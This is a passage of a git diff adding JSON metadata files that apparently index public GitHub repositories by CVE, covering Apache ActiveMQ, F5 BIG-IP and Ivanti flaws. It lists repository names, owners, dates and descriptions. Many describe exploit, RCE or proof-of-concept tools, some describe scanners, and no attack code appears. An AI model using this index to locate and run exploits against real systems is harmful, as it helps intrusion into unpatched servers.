+ "html_url": "https:\/\/github.com\/NKeshawarz"
+ },
+ "html_url": "https:\/\/github.com\/NKeshawarz\/CVE-2023-46604-RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-18T12:51:03Z",
+ "updated_at": "2023-12-07T21:36:30Z",
+ "pushed_at": "2023-11-18T13:18:51Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 720937725,
+ "name": "ActiveMQ_CVE-2023-46604",
+ "full_name": "minhangxiaohui\/ActiveMQ_CVE-2023-46604",
+ "owner": {
+ "login": "minhangxiaohui",
+ "id": 39674723,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39674723?v=4",
+ "html_url": "https:\/\/github.com\/minhangxiaohui"
+ },
+ "html_url": "https:\/\/github.com\/minhangxiaohui\/ActiveMQ_CVE-2023-46604",
+ "description": "PY",
+ "fork": false,
+ "created_at": "2023-11-20T02:24:47Z",
+ "updated_at": "2023-11-21T01:50:16Z",
+ "pushed_at": "2023-11-20T07:41:12Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 721121106,
+ "name": "CVE-2023-46604-demo",
+ "full_name": "nitzanoligo\/CVE-2023-46604-demo",
+ "owner": {
+ "login": "nitzanoligo",
+ "id": 100521249,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100521249?v=4",
+ "html_url": "https:\/\/github.com\/nitzanoligo"
+ },
+ "html_url": "https:\/\/github.com\/nitzanoligo\/CVE-2023-46604-demo",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-20T11:57:24Z",
+ "updated_at": "2023-11-20T11:57:25Z",
+ "pushed_at": "2023-11-20T12:03:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 725243332,
+ "name": "activemq-cve-2023-46604",
+ "full_name": "tomasmussi-mulesoft\/activemq-cve-2023-46604",
+ "owner": {
+ "login": "tomasmussi-mulesoft",
+ "id": 87021051,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87021051?v=4",
+ "html_url": "https:\/\/github.com\/tomasmussi-mulesoft"
+ },
+ "html_url": "https:\/\/github.com\/tomasmussi-mulesoft\/activemq-cve-2023-46604",
+ "description": "Repository to exploit CVE-2023-46604 reported for ActiveMQ",
+ "fork": false,
+ "created_at": "2023-11-29T18:30:02Z",
+ "updated_at": "2023-11-29T19:27:53Z",
+ "pushed_at": "2023-11-29T19:51:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 728564712,
+ "name": "CVE-Lab",
+ "full_name": "dcm2406\/CVE-Lab",
+ "owner": {
+ "login": "dcm2406",
+ "id": 106772368,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106772368?v=4",
+ "html_url": "https:\/\/github.com\/dcm2406"
+ },
+ "html_url": "https:\/\/github.com\/dcm2406\/CVE-Lab",
+ "description": "Instructions for exploiting vulnerabilities CVE-2021-44228 and CVE-2023-46604",
+ "fork": false,
+ "created_at": "2023-12-07T08:02:53Z",
+ "updated_at": "2024-03-21T06:45:44Z",
+ "pushed_at": "2024-03-20T06:20:44Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 729610758,
+ "name": "CVE-2023-46604",
+ "full_name": "mrpentst\/CVE-2023-46604",
+ "owner": {
+ "login": "mrpentst",
+ "id": 85231870,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85231870?v=4",
+ "html_url": "https:\/\/github.com\/mrpentst"
+ },
+ "html_url": "https:\/\/github.com\/mrpentst\/CVE-2023-46604",
+ "description": "Exploit for CVE-2023-46604",
+ "fork": false,
+ "created_at": "2023-12-09T19:19:03Z",
+ "updated_at": "2023-12-09T19:32:34Z",
+ "pushed_at": "2024-02-24T16:15:58Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 732382912,
+ "name": "CVE-2023-46604",
+ "full_name": "dcm2406\/CVE-2023-46604",
+ "owner": {
+ "login": "dcm2406",
+ "id": 106772368,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106772368?v=4",
+ "html_url": "https:\/\/github.com\/dcm2406"
+ },
+ "html_url": "https:\/\/github.com\/dcm2406\/CVE-2023-46604",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-16T13:50:58Z",
+ "updated_at": "2023-12-16T13:54:55Z",
+ "pushed_at": "2023-12-21T12:00:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 734983177,
+ "name": "Broker_ApacheMQ",
+ "full_name": "Mudoleto\/Broker_ApacheMQ",
+ "owner": {
+ "login": "Mudoleto",
+ "id": 106175454,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106175454?v=4",
+ "html_url": "https:\/\/github.com\/Mudoleto"
+ },
+ "html_url": "https:\/\/github.com\/Mudoleto\/Broker_ApacheMQ",
+ "description": "CVE-2023-46604 - ApacheMQ Version 5.15.5 Vulnerability Machine: Broker",
+ "fork": false,
+ "created_at": "2023-12-23T08:41:01Z",
+ "updated_at": "2023-12-26T05:21:10Z",
+ "pushed_at": "2023-12-26T05:21:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 740774996,
+ "name": "cve-2023-46604",
+ "full_name": "hh-hunter\/cve-2023-46604",
+ "owner": {
+ "login": "hh-hunter",
+ "id": 91593280,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91593280?v=4",
+ "html_url": "https:\/\/github.com\/hh-hunter"
+ },
+ "html_url": "https:\/\/github.com\/hh-hunter\/cve-2023-46604",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-09T03:18:19Z",
+ "updated_at": "2024-01-09T03:18:19Z",
+ "pushed_at": "2024-01-09T03:18:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 757561414,
+ "name": "ExploitScript-CVE-2023-46604",
+ "full_name": "ST3G4N05\/ExploitScript-CVE-2023-46604",
+ "owner": {
+ "login": "ST3G4N05",
+ "id": 67293586,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67293586?v=4",
+ "html_url": "https:\/\/github.com\/ST3G4N05"
+ },
+ "html_url": "https:\/\/github.com\/ST3G4N05\/ExploitScript-CVE-2023-46604",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-14T18:39:49Z",
+ "updated_at": "2024-02-14T19:20:54Z",
+ "pushed_at": "2024-02-14T19:19:47Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 767370814,
+ "name": "ActiveMQ-RCE-Exploit",
+ "full_name": "Arlenhiack\/ActiveMQ-RCE-Exploit",
+ "owner": {
+ "login": "Arlenhiack",
+ "id": 162281579,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162281579?v=4",
+ "html_url": "https:\/\/github.com\/Arlenhiack"
+ },
+ "html_url": "https:\/\/github.com\/Arlenhiack\/ActiveMQ-RCE-Exploit",
+ "description": "ActiveMQ RCE (CVE-2023-46604) 回显利用工具",
+ "fork": false,
+ "created_at": "2024-03-05T07:09:21Z",
+ "updated_at": "2024-05-22T05:00:36Z",
+ "pushed_at": "2024-03-05T09:16:50Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 787933435,
+ "name": "cve-2023-46604",
+ "full_name": "vulncheck-oss\/cve-2023-46604",
+ "owner": {
+ "login": "vulncheck-oss",
+ "id": 134310220,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134310220?v=4",
+ "html_url": "https:\/\/github.com\/vulncheck-oss"
+ },
+ "html_url": "https:\/\/github.com\/vulncheck-oss\/cve-2023-46604",
+ "description": "A go-exploit for Apache ActiveMQ CVE-2023-46604",
+ "fork": false,
+ "created_at": "2024-04-17T13:10:34Z",
+ "updated_at": "2024-04-17T13:29:19Z",
+ "pushed_at": "2024-04-17T13:27:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-46604",
+ "go-exploit"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 792301008,
+ "name": "activemq-rce-cve-2023-46604",
+ "full_name": "thinkycx\/activemq-rce-cve-2023-46604",
+ "owner": {
+ "login": "thinkycx",
+ "id": 13138128,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13138128?v=4",
+ "html_url": "https:\/\/github.com\/thinkycx"
+ },
+ "html_url": "https:\/\/github.com\/thinkycx\/activemq-rce-cve-2023-46604",
+ "description": "activemq-rce-cve-2023-46604",
+ "fork": false,
+ "created_at": "2024-04-26T11:42:57Z",
+ "updated_at": "2024-04-26T11:45:33Z",
+ "pushed_at": "2024-04-26T11:45:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 807674683,
+ "name": "honeypot.rs",
+ "full_name": "mranv\/honeypot.rs",
+ "owner": {
+ "login": "mranv",
+ "id": 61981861,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61981861?v=4",
+ "html_url": "https:\/\/github.com\/mranv"
+ },
+ "html_url": "https:\/\/github.com\/mranv\/honeypot.rs",
+ "description": " CVE-2023-46604 (Apache ActiveMQ RCE Vulnerability) and focused on getting Indicators of Compromise.",
+ "fork": false,
+ "created_at": "2024-05-29T14:56:41Z",
+ "updated_at": "2024-05-29T18:18:22Z",
+ "pushed_at": "2024-05-29T18:18:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808380814,
+ "name": "CVE-2023-46604",
+ "full_name": "pulentoski\/CVE-2023-46604",
+ "owner": {
+ "login": "pulentoski",
+ "id": 60004847,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60004847?v=4",
+ "html_url": "https:\/\/github.com\/pulentoski"
+ },
+ "html_url": "https:\/\/github.com\/pulentoski\/CVE-2023-46604",
+ "description": "El script explota una vulnerabilidad de deserialización insegura en Apache ActiveMQ (CVE-2023-46604) ",
+ "fork": false,
+ "created_at": "2024-05-31T00:38:47Z",
+ "updated_at": "2024-05-31T02:30:52Z",
+ "pushed_at": "2024-05-31T02:29:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46615.json b/2023/CVE-2023-46615.json
new file mode 100644
index 0000000000..5aaccd9185
--- /dev/null
+++ b/2023/CVE-2023-46615.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 725628979,
+ "name": "CVE-2023-46615",
+ "full_name": "RandomRobbieBF\/CVE-2023-46615",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-46615",
+ "description": "KD Coming Soon <= 1.7 - Unauthenticated PHP Object Injection via cetitle",
+ "fork": false,
+ "created_at": "2023-11-30T14:46:21Z",
+ "updated_at": "2023-11-30T14:46:21Z",
+ "pushed_at": "2023-11-30T14:51:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46694.json b/2023/CVE-2023-46694.json
new file mode 100644
index 0000000000..c4f11c0fdc
--- /dev/null
+++ b/2023/CVE-2023-46694.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 765655083,
+ "name": "CVE-2023-46694",
+ "full_name": "invisiblebyte\/CVE-2023-46694",
+ "owner": {
+ "login": "invisiblebyte",
+ "id": 42798162,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42798162?v=4",
+ "html_url": "https:\/\/github.com\/invisiblebyte"
+ },
+ "html_url": "https:\/\/github.com\/invisiblebyte\/CVE-2023-46694",
+ "description": "CVE-2023-46694 proof-of-concept",
+ "fork": false,
+ "created_at": "2024-03-01T11:00:19Z",
+ "updated_at": "2024-05-27T13:02:53Z",
+ "pushed_at": "2024-03-01T11:02:33Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46747.json b/2023/CVE-2023-46747.json
new file mode 100644
index 0000000000..bf234b1da2
--- /dev/null
+++ b/2023/CVE-2023-46747.json
@@ -0,0 +1,278 @@
+[
+ {
+ "id": 712777457,
+ "name": "CVE-2023-46747-Mass-RCE",
+ "full_name": "bijaysenihang\/CVE-2023-46747-Mass-RCE",
+ "owner": {
+ "login": "bijaysenihang",
+ "id": 89993432,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89993432?v=4",
+ "html_url": "https:\/\/github.com\/bijaysenihang"
+ },
+ "html_url": "https:\/\/github.com\/bijaysenihang\/CVE-2023-46747-Mass-RCE",
+ "description": "CVE-2023-46747 (F5 BIG-IP) RCE",
+ "fork": false,
+ "created_at": "2023-11-01T07:05:18Z",
+ "updated_at": "2023-11-02T00:30:14Z",
+ "pushed_at": "2023-10-30T14:01:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 712827804,
+ "name": "CVE-2023-46747-RCE",
+ "full_name": "W01fh4cker\/CVE-2023-46747-RCE",
+ "owner": {
+ "login": "W01fh4cker",
+ "id": 101872898,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4",
+ "html_url": "https:\/\/github.com\/W01fh4cker"
+ },
+ "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2023-46747-RCE",
+ "description": "exploit for f5-big-ip RCE cve-2023-46747",
+ "fork": false,
+ "created_at": "2023-11-01T09:31:05Z",
+ "updated_at": "2024-06-24T02:21:12Z",
+ "pushed_at": "2024-03-26T03:01:04Z",
+ "stargazers_count": 199,
+ "watchers_count": 199,
+ "has_discussions": false,
+ "forks_count": 45,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0day",
+ "cve-2023-46747",
+ "exploit",
+ "f5",
+ "redteam"
+ ],
+ "visibility": "public",
+ "forks": 45,
+ "watchers": 199,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 712913642,
+ "name": "CVE-2023-46747",
+ "full_name": "fu2x2000\/CVE-2023-46747",
+ "owner": {
+ "login": "fu2x2000",
+ "id": 34998869,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34998869?v=4",
+ "html_url": "https:\/\/github.com\/fu2x2000"
+ },
+ "html_url": "https:\/\/github.com\/fu2x2000\/CVE-2023-46747",
+ "description": "CVE-2023-46747 Criticle Auth Bypass",
+ "fork": false,
+ "created_at": "2023-11-01T13:16:13Z",
+ "updated_at": "2023-11-01T13:17:31Z",
+ "pushed_at": "2023-11-01T13:17:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 712959399,
+ "name": "Mitigate-CVE-2023-46747",
+ "full_name": "maniak-academy\/Mitigate-CVE-2023-46747",
+ "owner": {
+ "login": "maniak-academy",
+ "id": 80640505,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80640505?v=4",
+ "html_url": "https:\/\/github.com\/maniak-academy"
+ },
+ "html_url": "https:\/\/github.com\/maniak-academy\/Mitigate-CVE-2023-46747",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-01T14:57:20Z",
+ "updated_at": "2023-11-04T15:33:52Z",
+ "pushed_at": "2023-11-05T17:10:40Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 713000566,
+ "name": "CVE-2023-46747-POC",
+ "full_name": "y4v4z\/CVE-2023-46747-POC",
+ "owner": {
+ "login": "y4v4z",
+ "id": 149609226,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149609226?v=4",
+ "html_url": "https:\/\/github.com\/y4v4z"
+ },
+ "html_url": "https:\/\/github.com\/y4v4z\/CVE-2023-46747-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-01T16:28:28Z",
+ "updated_at": "2023-11-01T16:28:29Z",
+ "pushed_at": "2023-11-01T16:30:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 713485222,
+ "name": "test_cve-2023-46747",
+ "full_name": "nvansluis\/test_cve-2023-46747",
+ "owner": {
+ "login": "nvansluis",
+ "id": 42541546,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42541546?v=4",
+ "html_url": "https:\/\/github.com\/nvansluis"
+ },
+ "html_url": "https:\/\/github.com\/nvansluis\/test_cve-2023-46747",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-02T16:03:35Z",
+ "updated_at": "2024-04-30T00:33:25Z",
+ "pushed_at": "2023-11-02T16:10:16Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 713900805,
+ "name": "CVE-2023-46747",
+ "full_name": "RevoltSecurities\/CVE-2023-46747",
+ "owner": {
+ "login": "RevoltSecurities",
+ "id": 119435129,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4",
+ "html_url": "https:\/\/github.com\/RevoltSecurities"
+ },
+ "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2023-46747",
+ "description": "An Exploitation script developed to exploit the CVE-2023-46747 which Pre Auth Remote Code Execution of f5-BIG Ip producs",
+ "fork": false,
+ "created_at": "2023-11-03T13:31:11Z",
+ "updated_at": "2024-04-24T17:45:07Z",
+ "pushed_at": "2023-11-03T14:37:28Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 755942386,
+ "name": "cve-2023-46747",
+ "full_name": "vidura2\/cve-2023-46747",
+ "owner": {
+ "login": "vidura2",
+ "id": 71623511,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71623511?v=4",
+ "html_url": "https:\/\/github.com\/vidura2"
+ },
+ "html_url": "https:\/\/github.com\/vidura2\/cve-2023-46747",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-11T14:38:37Z",
+ "updated_at": "2024-02-11T14:40:39Z",
+ "pushed_at": "2024-02-11T14:40:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 772788309,
+ "name": "CVE-2023-46747-RCE",
+ "full_name": "rainbowhatrkn\/CVE-2023-46747-RCE",
+ "owner": {
+ "login": "rainbowhatrkn",
+ "id": 147452376,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147452376?v=4",
+ "html_url": "https:\/\/github.com\/rainbowhatrkn"
+ },
+ "html_url": "https:\/\/github.com\/rainbowhatrkn\/CVE-2023-46747-RCE",
+ "description": "exploit for f5-big-ip RCE cve-2023-46747",
+ "fork": false,
+ "created_at": "2024-03-15T22:45:31Z",
+ "updated_at": "2024-03-15T22:45:32Z",
+ "pushed_at": "2024-03-15T22:45:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46805.json b/2023/CVE-2023-46805.json
new file mode 100644
index 0000000000..72985a1333
--- /dev/null
+++ b/2023/CVE-2023-46805.json
@@ -0,0 +1,251 @@
+[
+ {
+ "id": 743237104,
+ "name": "CVE-2023-46805",
+ "full_name": "yoryio\/CVE-2023-46805",
+ "owner": {
+ "login": "yoryio",
+ "id": 134471901,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4",
+ "html_url": "https:\/\/github.com\/yoryio"
+ },
+ "html_url": "https:\/\/github.com\/yoryio\/CVE-2023-46805",
+ "description": "Scanner for CVE-2023-46805 - Ivanti Connect Secure",
+ "fork": false,
+ "created_at": "2024-01-14T18:30:11Z",
+ "updated_at": "2024-04-12T10:31:16Z",
+ "pushed_at": "2024-01-24T07:15:43Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-46805",
+ "cve-2024-21887",
+ "ivanti-connect-secure"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 743894339,
+ "name": "CVE-2023-46805",
+ "full_name": "cbeek-r7\/CVE-2023-46805",
+ "owner": {
+ "login": "cbeek-r7",
+ "id": 117099647,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117099647?v=4",
+ "html_url": "https:\/\/github.com\/cbeek-r7"
+ },
+ "html_url": "https:\/\/github.com\/cbeek-r7\/CVE-2023-46805",
+ "description": "Simple scanner for scanning a list of ip-addresses for vulnerable Ivanti Pulse Secure devices",
+ "fork": false,
+ "created_at": "2024-01-16T08:05:58Z",
+ "updated_at": "2024-04-12T10:31:35Z",
+ "pushed_at": "2024-01-19T09:02:40Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 744186376,
+ "name": "CVE-2023-46805_CVE-2024-21887",
+ "full_name": "duy-31\/CVE-2023-46805_CVE-2024-21887",
+ "owner": {
+ "login": "duy-31",
+ "id": 20819326,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20819326?v=4",
+ "html_url": "https:\/\/github.com\/duy-31"
+ },
+ "html_url": "https:\/\/github.com\/duy-31\/CVE-2023-46805_CVE-2024-21887",
+ "description": "An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.",
+ "fork": false,
+ "created_at": "2024-01-16T19:40:59Z",
+ "updated_at": "2024-06-14T17:17:06Z",
+ "pushed_at": "2024-01-17T19:14:09Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 745015590,
+ "name": "CVE-2023-46805_CVE-2024-21887",
+ "full_name": "raminkarimkhani1996\/CVE-2023-46805_CVE-2024-21887",
+ "owner": {
+ "login": "raminkarimkhani1996",
+ "id": 26582031,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26582031?v=4",
+ "html_url": "https:\/\/github.com\/raminkarimkhani1996"
+ },
+ "html_url": "https:\/\/github.com\/raminkarimkhani1996\/CVE-2023-46805_CVE-2024-21887",
+ "description": "The script in this repository only checks whether the vulnerabilities specified in the Ivanti Connect Secure product exist.",
+ "fork": false,
+ "created_at": "2024-01-18T13:25:46Z",
+ "updated_at": "2024-04-30T02:04:11Z",
+ "pushed_at": "2024-03-23T14:52:22Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 745284788,
+ "name": "Ivanti-Connect-Around-Scan",
